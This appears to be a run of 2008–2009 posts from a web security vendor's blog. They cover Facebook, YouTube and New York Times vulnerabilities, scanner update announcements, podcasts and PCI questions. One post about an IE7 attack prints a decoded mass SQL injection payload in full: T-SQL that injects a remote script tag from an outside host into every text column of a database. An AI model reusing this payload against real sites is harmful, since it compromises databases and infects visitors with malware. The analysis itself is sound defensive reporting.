The XSSed site reported a series of highly critical XSS vulnerabilities on Facebook (December 15, 2008 and again on January 4, 2009) that hackers can exploit.  Various Facebook functionalities affected include the new users registration page, iPhone login, reset password pages, and others. 

Malicious people can exploit these XSS bugs to infect millions of Facebook members with malware, adware and spyware.

So far, Facebook has not fixed these flaws, so be very careful when using your account by questioning suspicious requests and not accepting friend invites from people you don’t know. 

by
Erin Swanson
Eswanson@cenzic.com

Cenzic is proud to interview its own CEO, John Weinschenk, as part of their Myth Buster series on application security.  This is an additional pod cast to the 6 interviews already conducted on the show floor at the 2008 BlackHat Conference in Las Vegas, NV.

Mr. Weinschenk re-iterated many of the other panelists’ statements about the state of application security:  the biggest issue stems from the lack of security understanding.  He’s seeing a trend that the government is starting to fine companies for not having secure Websites in the first place, regardless if data was stolen.  And with the new president coming into office on January 20 with his cyber security initiatives, it’s more important than ever to secure your Website against hacker attacks.            

With regards to Web application security, every company should have the same slogan as Obama’s presidential campaign:  Yes We Can!  

If you have any other questions or topic suggestions about the latest myths out there, send an email to:  mythbusters@cenzic.com

by
Erin Swanson, Marketing
Eswanson@cenzic.com

A New Year means adding a new SmartAttack for Cenzic – the JavaScript Hijacking SmartAttack - making it our 96th SmartAttack!  We added this support to the SmartAttack library arsenal on January 2, 2009 due to the rising number of eavesdropping attacks against AJAX-style Web applications.  This vulnerability was discovered on Gmail and recently fixed. 

JavaScript Hijacking is an attack that tricks the victim into loading a page that contains a malicious request.  The request is malicious because it inherits the identity and privileges of the victim to perform an undesired function on the victim's behalf.  If an application is vulnerable, an attacker can force a logged-in victim's browser to send pre-authenticated AJAX request to a vulnerable Web application, potentially forcing the victim's browser to perform a hostile action.  This allows an attacker to perform all the legitimate actions which a legitimate user can perform after a log-in.

And because our development team felt extra ambitious over the holiday season, we also added enhanced support for our Web Server SmartAttack by updating it with the PHP 'imageRotate()' Uninitialized Memory Information Disclosure Vulnerability (Bugtraq ID 33002).  More information about this vulnerability can be found at:
http://www.securityfocus.com/bid/33002/

To learn more details on how you can automatically update your Cenzic Hailstorm product, visit our Website.
     
Background on Cenzic’s SmartAttacks
Every week, Cenzic’s suite of products is updated with the latest vulnerabilities (custom, commercial, and open-source) to use when it emulates a hacker and attacks our customer’s Websites to detect their security posture.   These Web application vulnerabilities include (but not limited to) cross site scripting, buffer overflow, path or directory traversal, SQL injection, HTTP response splitting, and other workflow types.

by
Erin Swanson
ESwanson@cenzic.com

With the ever increasing economic turmoil ravishing the US and the rest of the world, cyber terrorism has now grown to a national security scale.  According to this article, picked up by MSNBC, Hackers are now more desperate and determined to exploit the ever growing number of vulnerabilities in Websites and Web applications in 2009. 

Research conducted by Cenzic and others estimate that about 7,000 vulnerabilities will be reported for 2008. Of these, over 70 percent are related to Web applications and over 65 percent easily exploitable. Similar results are expected in 2009, proving that the United States is not prepared for a direct cyber terrorist attack.

This news is so important, it was even picked up by MSNBC.   

How will you protect your data against hackers?  There are a lot of options out there, but remember that network security and SSL solutions won’t work, as you need to check for security defects at the Web application level.  At the risk of sounding bias, we recommend you take a look at Cenzic’s offerings to guard your Website against hacker attacks.  What do you have to lose?

Have a safe and Happy New Year.
Erin Swanson
Eswanson@cenzic.com

On December 26, 2008, Cenzic added enhanced support to their Web Server SmartAttack which includes updates to the PHP ‘mbstring’ Extension Buffer Overflow Vulnerability (BugtraqID 32948). 

PHP is prone to a buffer overflow vulnerability because it fails to perform boundary checks before copying user-supplied data to insufficiently sized memory buffers.  Hackers can exploit this vulnerability by executing arbitrary machine code in the context of the affected Web server.  Even failed attempts will likely crash the Web server, denying service to legitimate users. 

The following PHP versions are affected:

PHP/5.1.1 to PHP/5.1.6
PHP/5.0.0 to PHP/5.0.5
PHP/4.4.1 to PHP/4.4.9
PHP/4.3.1 to PHP/4.3.9

Detail information can be looked at
http://www.securityfocus.com/bid/32948/

To learn more details on how you can automatically update your Cenzic Hailstorm product, visit our Website.
     
Background on Cenzic’s SmartAttacks
Every week, Cenzic’s suite of products is updated with the latest vulnerabilities (custom, commercial, and open-source) to use when it emulates a hacker and attacks our customer’s Websites to detect their security posture.   These Web application vulnerabilities include (but not limited to) cross site scripting, buffer overflow, path or directory traversal, SQL injection, HTTP response splitting, and other workflow types.

by
Erin Swanson
ESwanson@cenzic.com

An article about the top 10 security breaches of 2008, cited that 2 out of the 10 breaches were done to companies who were in compliance with PCI regulations. 

Both Maine-based Hannaford Brothers grocery store chain and ski resort Okemo were hit by hackers that installed malicious software on their Websites to capture credit card data.  And at the time of both attacks, the companies were PCI compliant.  These firms now share company with the likes of Forever 21 – a retail clothing company – that was victim to a similar attack back in October.

I liked how the author summarized PCI compliance: 

Lesson Learned:  PCI compliance is like a driver's license -- it may mean that a retailer has passed the test for compliance, but doesn't necessarily mean it is in compliance.

At the risk of sounding redundant, we will stress again, that companies must do more that just attain PCI compliance.  They must constantly test and re-test their Websites for the latest vulnerability threats, as 400 new ones emerge every month.

by
Erin Swanson
Eswanson@cenzic.com

YouTube is the second big-brand company that we are featuring from Bill Zeller’s recent paper and post that got hacked through a CSRF vulnerability.   

Zeller discovered CSRF vulnerabilities in nearly every action a user could perform on YouTube.  Specific details are described in the paper. 

Here are a few examples of what an attacker could do on YouTube via the CSRF vulnerabilities: 

§ Add videos to a user's "Favorites,"

§ Add himself to a user's "Friend" or "Family" list,

§ Send arbitrary messages on the user's behalf,

§ Flag videos as inappropriate,

§ Automatically share a video with a user's contacts,

§ Subscribe a user to a "channel" (a set of videos published by one person or group) and,

§ Add videos to a user's "QuickList" (a list of videos a user intends to watch at a later point).  

According to the report, YouTube has fixed these vulnerabilities.

by
Erin Swanson
Eswanson@cenzic.com

According to a recent post and paper by Bill Zeller, The New York Times was among four popular Websites that got hacked through a CSRF vulnerability. 

This CSRF vulnerability was exploited to extract the email address of a user.  The attack can be used for identification (e.g., finding the email addresses of all users who visit an attacker's site) or for spam. This attack is particularly dangerous because of the large number of users who have NYTimes' accounts and because the NYTimes keeps users logged in for over a year. 

According to the report, the New York Times fixed this issue after a few months of prodding by the author. 

Here’s a great summary by the author about CSRF and how little the IT and security community know about this vulnerability:

The Sleeping Giant
Cross-Site Request Forgery (CSRF) attacks occur when a malicious Website causes a user’s Web browser to perform an unwanted action on a trusted site. These attacks have been called the “sleeping giant” of Web-based vulnerabilities, because many sites fail to protect against them and they’ve been largely ignored by the Web development and security communities.  CSRF attacks do not appear in the Web Security Threat Classification and are rarely discussed in academic or technical literature.  CSRF attacks are simple to diagnose, simple to exploit and simple to fix. They exist because Web developers are uneducated about the cause and seriousness of CSRF attacks.  Web developers also may be under the mistaken impression that defenses against the better-known Cross-Site Scripting (XSS) problem also protect against CSRF attacks.

by
Erin Swanson
ESwanson@cenzic.com

Hot off the press – Cenzic was just named as one of the top “Hot Companies” in 2009 by Network Products Guide.  We share the limelight with esteemed tech giants like Red Hat and VeriSign. 

The winner out of the 71 finalists will be named on March 26-27, 2009 at the Gala Award Ceremony in San Francisco. 

by
Erin Swanson
Eswanson@cenzic.com

On December 19, 2008, Cenzic added enhanced support to their Web Server SmartAttack which includes updates to the PHP Vulnerability for security bypass weakness (BugtraqID 32673).  Specifically, the updates are to the PHP 5.2.7 'magic_quotes_gpc' Security Bypass Weakness Vulnerability.
 
Hackers can exploit this vulnerability by bypassing security checks in PHP applications that rely on the Magic Quotes functionality.  This opens such applications up to attacks that take advantage of the software's failure to properly sanitize user input.
PHP version 5.2.7 is affected. 

Detail information can be looked at
http://www.securityfocus.com/bid/32673/

To learn more details on how you can automatically update your Cenzic Hailstorm product, visit our Website.
     
Background on Cenzic’s SmartAttacks
Every week, Cenzic’s suite of products is updated with the latest vulnerabilities (custom, commercial, and open-source) to use when it emulates a hacker and attacks our customer’s Websites to detect their security posture.   These Web application vulnerabilities include (but not limited to) cross site scripting, buffer overflow, path or directory traversal, SQL injection, HTTP response splitting, and other workflow types.

by
Erin Swanson
ESwanson@cenzic.com

Big news today as Microsoft issued an emergency security patch for their IE browser due to a SQL injection vulnerability.  What’s interesting is that even though this is a vulnerability in IE 7 (it has only been found in 7), it’s being exploited by vulnerable Web servers.  Hence, you cannot have one without the other.

Attackers have been using an SQL injection vulnerability to exploit a Website and leave behind a nasty java script.  SAN’s Storm Center explains it quite well and shows the original code. 

The code on the site above can be decoded as:

DECLARE @T varchar(255),@C varchar(255)
DECLARE Table_Cursor CURSOR FOR
  select a.name,b.name from sysobjects a,syscolumns b
  where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or 
                      b.xtype=231 or b.xtype=167)
OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C
  WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+']
   set ['+@C+']=rtrim(convert(varchar(4000),['+@C+']))+
       ''<script src=http:// 17gamo . com/1.js></script>''')
FETCH NEXT FROM  Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

You can see the JavaScript in the above decoded code …
<script src=http:// 17gamo . com/1.js></script>

This is what is sent to the vulnerable IE 7 browser.  Hence, after the Website has been injected, this JavaScript waits for the vulnerable IE 7 which then activates the malicious code and the browser gets owned. 

This is fascinating because of its codependence.  The vulnerable Website and the vulnerable IE 7 work together to make this attack happen.  We could get philosophical and talk about the chicken or egg thing.  The vulnerable site is at fault, but so is the end user who isn't patching their browser. 

So if you have a Web application on the Internet you should be diligent about knowing whether or not your site is secure.  2008 has certainly been the year of the SQL injection and I am guessing 2009 will be about the same especially if we continue to ignore these vulnerable sites.  Be a good citizen of the Internet and scan your site for these vulnerabilities. 

<and now for the shameless plug> 

Cenzic has a product that scans your Website remotely for these and other vulnerabilities and shows you results in just one week.  Call us today – you’d be helping the Internet be a safer place. 

by
Doug Simpson, Sales Engineering
DSimpson@cenzic.com

In case you have specific questions about PCI 6.6 compliance, then email me to get a full list of our FAQs gathered from our live Web seminar audience.  We take the time to list all the audience questions and answer each one, so take advantage of all our time and research and get a copy today.

Here are a couple Q/A examples below.

by
Erin Swanson
Eswanson@cenzic.com

Q:  Who is collecting the PCI fines and how?

A:  Fines are typically levied by VISA, MC, Discover etc. from the merchants and acquirers.  If a card company finds that the merchant is non-compliant they would send them a notice of non-compliance and ask them to pay penalties.

Q: Are there/what are the fines for levels 3 and 4? What are the drop dead dates for compliance by companies under versions 1.1 and 1.2?

A: Although there are no specific fines outlined by PCI, each credit card company can impose fines for non-compliance.  Right now, the guidelines are: Level 3 Merchants-Contact acquirer or credit card company; Level 4 Merchants-Must have compliance plan submitted, via acquirer, to Visa by July 30, 2007.   According to Visa, currently:

* 77 percent of Level 1 merchants were PCI compliant
* 78 percent of Level 2 merchants were PCI compliant
* 56 percent of Level 3 merchants were PCI compliant

December is always the month of reflection and this year is no different, with the following article listing the top 12 cyber crime stories of 2008. 

TJ Maxx – the now infamous retail chain store – was included in the list as the victim of the largest breach of credit card numbers on record (45.6 million credit and debit card numbers were affected). 

Back in July 2008, the US DOJ revealed that a group of hackers used a combination of wardriving, sniffer software, and SQL Injection attacks to steal over 45.6 million credit and debit card numbers from TJ Maxx (and others such as OfficeMax and Barnes & Noble) and store them on underground server systems in the US, Latvia, and the Ukraine.  The DOJ has indicted 11 alleged hackers on charges of computer fraud, wire fraud, access device fraud, aggravated identity theft.  So far only one of the 11 people charged by the DOJ has pleaded guilty.

I'm sure there will be more news and information about the hacks in 2009.

by
Erin Swanson
Eswanson@cenzic.com

On December 12, 2008, Cenzic added enhanced support to their Web Server SmartAttack which includes updates to the PHP vulnerability for shared hosting configuration (BugtraqID 32688).  Specifically, the updates are to the PHP SAPI 'php_getuid()' Safe Mode Restriction-Bypass Vulnerability.

Shared-hosting configuration has gained popularity in the past few months and PHP is prone to a 'safe_mode' restriction-bypass vulnerability.  Successful exploits could allow an attacker to bypass some safe-mode restrictions.

This vulnerability would be an issue in shared-hosting configurations where multiple users can create and execute arbitrary PHP script code, with the 'safe_mode' restrictions assumed to isolate the users from each other.

Versions prior to PHP 5.2.8 are vulnerable.

To learn more details on how you can automatically update your Cenzic Hailstorm product, visit our Website.
     
Background on Cenzic’s SmartAttacks
Every week, Cenzic’s suite of products is updated with the latest vulnerabilities (custom, commercial, and open-source) to use when it emulates a hacker and attacks our customer’s Websites to detect their security posture.   These Web application vulnerabilities include (but not limited to) cross site scripting, buffer overflow, path or directory traversal, SQL injection, HTTP response splitting, and other workflow types.

by
Erin Swanson
ESwanson@cenzic.com

Cenzic is proud to interview Bob West, Founder and CEO of Echelon One, as part of their Myth Buster series on application security.  This is the last of the 6 pod cast interviews conducted on the show floor at the 2008 BlackHat Conference in Las Vegas, NV.

Mr. West said that the state of application security is far less than ideal due to two main reasons.  The first stems from the lack of understanding at the executive level about application security.  The second is the inability people have to code securely.  Companies need to train their developers and QA employees on how to build secure code in order to ensure their Web apps aren’t as vulnerable to hacker attacks.      

Bob summarizes his feelings about Web application security in these words:  Draw a line in the sand and do the bare minimum - take an inventory of all your Web applications.  Then prioritize this list to focus on the security health of your most mission critical apps first. 

So take 8 minutes of your day to listen to the podcast to hear more of his insights. 

If you have any other questions or topic suggestions about the latest myths out there, send an email to:  mythbusters@cenzic.com

by
Erin Swanson, Marketing
Eswanson@cenzic.com

The big TV network CBS is the latest big brand name to have its Website hacked via an iFrame attack.

According to this recent article, Russian malware distributors were able to launch an iFrame attack on a subdomain of the cbs.com site so that it was serving remote malware to any visitor of the site.  A user’s vulnerability to the malware attack launched by the site hack would depend on a variety of factors such as the security used on the PC, the OS, and even the browser version.

What is an iFrame?

An iFrame is an element within an HTML page that can be loaded and refreshed separately from the rest of the page to make more interactive applications possible (and thus, often used by AJAX).  Example applications include rich text editors as used by Google Docs.  iFrames can be exploited when (1) the site is hacked, (2) when an XSS causes a reload of the iFrame using external “hacker code”, or (3) when a SQL query includes an injection of “hacker code” to be loaded into the iFrame.  

It seems that someone infected with Asprox visited an area within CBS’s Website that had an XSS or SQL Injection vulnerability. 

How the Attack Occurred:  the Asprox Injection Process

1. The end-user visits the infected legitimate site (CBS.com) and is redirected to a malicious Website
2. Multiple redirects using JAVA and iFrames land the user on servers running Neosploit
3. The end-user is infected with Asprox malware
4. The user’s infected box is now both a zombie and a host for Asprox
5. The end-user infects further Websites via SQL Injection;  redirects end-users to it

2008 appears to have become the year of the SQL injection and the makers of Asprox have figured out how to include this in their attack arsenal.  Web application security scanning solutions such as Cenzic Hailstorm can discover these vulnerabilities in your Web app before Asprox or an infected visitor does and exploits them.

We’ll be giving CBS.com a call.

by
Doug Simpson & Mike Kazmierczak, Sales Engineers
Dsimpson@cenzic.com and Mike@cenzic.com

Cenzic is proud to interview Art Conklin, Ph.D., as part of their Myth Busters series on application security.  This is the fifth out of six pod cast interviews conducted on the show floor at the 2008 BlackHat Conference in Las Vegas.

Art Conklin – an assistant professor at the University of Houston – said that universities are just like any other company as they struggle in securing their Websites and Web applications.  Universities are prime targets for hacker attacks as they have large amounts of information accessible via Web applications.

According to Dr. Conklin, most companies and IT professionals believe they are doing a “good enough” job, but it’s the biggest myth out there.  There is no silver bullet and no single “werewolf”:  for every type of Web security issue, you need a specific Web security solution.  So don’t rely solely on SSL, for example.  You need this type of security, but it’s not a panacea against every attack out there. 

Dr. Conklin summarizes his feelings about the application security market in these words:  If you aren’t doing something proactive about Web security, then you need to go into a new career, as you won’t last very long.

So take 10 minutes of your day to listen to the podcast to hear more of his insights. 

If you have any other questions or topic suggestions about the latest myths out there, send an email to:  mythbusters@cenzic.com

by
Erin Swanson, Marketing
Eswanson@cenzic.com

On December 5, 2008, Cenzic added enhanced support to their Web Server SmartAttack that includes updates to PHP ZipArchive.  Details are listed below.

Web Services SmartAttack

• PHP ZipArchive::extractTo() '.zip' Files Directory Traversal Vulnerability (BugtraqID 32625)
  
  PHP has recently been found to be prone to a directory-traversal vulnerability.  The affected application fails to adequately sanitize user-supplied input. A successful attack allows the Hacker to create or overwrite arbitrary files on the system, which allows execution of arbitrary script code in the context of the Webserver.   This vulnerability is especially dangerous, as a hacker could exploit this issue using standard client applications.  PHP versions affected: PHP/5.2.1 to PHP/5.2.6
  Detail information can be found at: http://www.securityfocus.com/bid/32625/solution

To learn more details on how you can automatically update your Cenzic Hailstorm product, visit our Website.
     
Background on Cenzic’s SmartAttacks
Every week, Cenzic’s suite of products is updated with the latest vulnerabilities (custom, commercial, and open-source) to use when it emulates a hacker and attacks our customer’s Websites to detect their security posture.   These Web application vulnerabilities include (but not limited to) cross site scripting, buffer overflow, path or directory traversal, SQL injection, HTTP response splitting, and other workflow types.

by
Erin Swanson
ESwanson@cenzic.com

According to CSO Online, there are 5 top things Obama should do about cyber security and Web application security is at the top of the list. 

Our own CMO, Mandeep Khera was quoted as saying:

"Obama [and his IT security advisors] needs to focus on securing Web applications that have largely been ignored by previous administrations.  With millions of hacking attempts on our government infrastructure every day and thousands of successful attacks against corporations through the Web site, government needs to step in and create stronger regulations to enforce the security of our Web sites."

Here are the Top 5 suggestions made by CSO Online:

1. Secure Web apps
2. Wipe the dust off of older regs
3. Demand better security training
4. Build a great cyber wall (against China and others)
5. Give someone control (and make them accountable)

by
Erin Swanson
Eswanson@cenzic.com

Enterprise Management Quarterly just picked up an article I wrote on the latest security threats showing up in SaaS applications.  If you are a company that hosts a SaaS application or you use such a technology, you should take a look.

Some highlights in the article include:

• SaaS providers are becoming the gatekeeper for sensitive information, whether in the form of personal data or corporate data. 
• To improve the process for regularly staging copies of your production applications, virtualization comes into play.
• Continuous testing will ensure that your organization will mitigate risks in the increasingly popular SaaS offerings.

Also, you should check out our MythBuster series on Web application security that is featured on our blog.  Click on the link:  http://blog.cenzic.com/public/item/212740 to listen to the podcast and get answers addressing:

1. Do SSL and Network security tools protect your Web sites against hacker attacks? 
2. Can you get away with testing your applications only in QA and Dev?
3. Are commercial Web applications like SAP and Oracle safe to use or do you need to test them for vulnerabilities?
4. Is attaining PCI compliance enough to secure you against hacker attacks?

by
Lars Ewe, CTO
Lars@cenzic.com

On November 28, 2008, Cenzic added enhanced support to their Web Server SmartAttack that includes updates to PHP and Apache Tomcat.  Details are listed below.

Web Services SmartAttack

• PHP Zip_Entry_Read() Integer Overflow Vulnerability (BugtraqID 23169)
  • Versions of PHP have been found prone to an integer-overflow vulnerability. Affected versions of PHP which are also identified and scanned by the Smart Attack fail to ensure that integer values aren't overrun. Attackers may exploit this issue to cause a heap-based buffer overflow.  It is important to identify such a vulnerability as early as possible not only because exploiting this issue may allow attackers to execute arbitrary machine code in the context of the affected application but even failed exploit attempts will likely result in a denial-of-service condition.
    Detail information can be found here: http://www.securityfocus.com/bid/23169/solution
• Apache Tomcat Mod_JK.SO Arbitrary Code Execution Vulnerability (BugtraqID 22791)
  • This update will enable Cenzic to unearth another vulnerability in the Apache Tomacat Servlet Container.  Apache Tomcat is prone to a vulnerability that will allow remote attackers to execute arbitrary code on an affected computer. A successful attack may result in a complete compromise.
    Detail information can be found here: http://www.securityfocus.com/bid/22791/solution

To learn more details on how you can automatically update your Cenzic Hailstorm product, visit our Website.
     
Background on Cenzic’s SmartAttacks
Every week, Cenzic’s suite of products is updated with the latest vulnerabilities (custom, commercial, and open-source) to use when it emulates a hacker and attacks our customer’s Websites to detect their security posture.   These Web application vulnerabilities include (but not limited to) cross site scripting, buffer overflow, path or directory traversal, SQL injection, HTTP response splitting, and other workflow types.

by
Erin Swanson
Eswanson@cenzic.com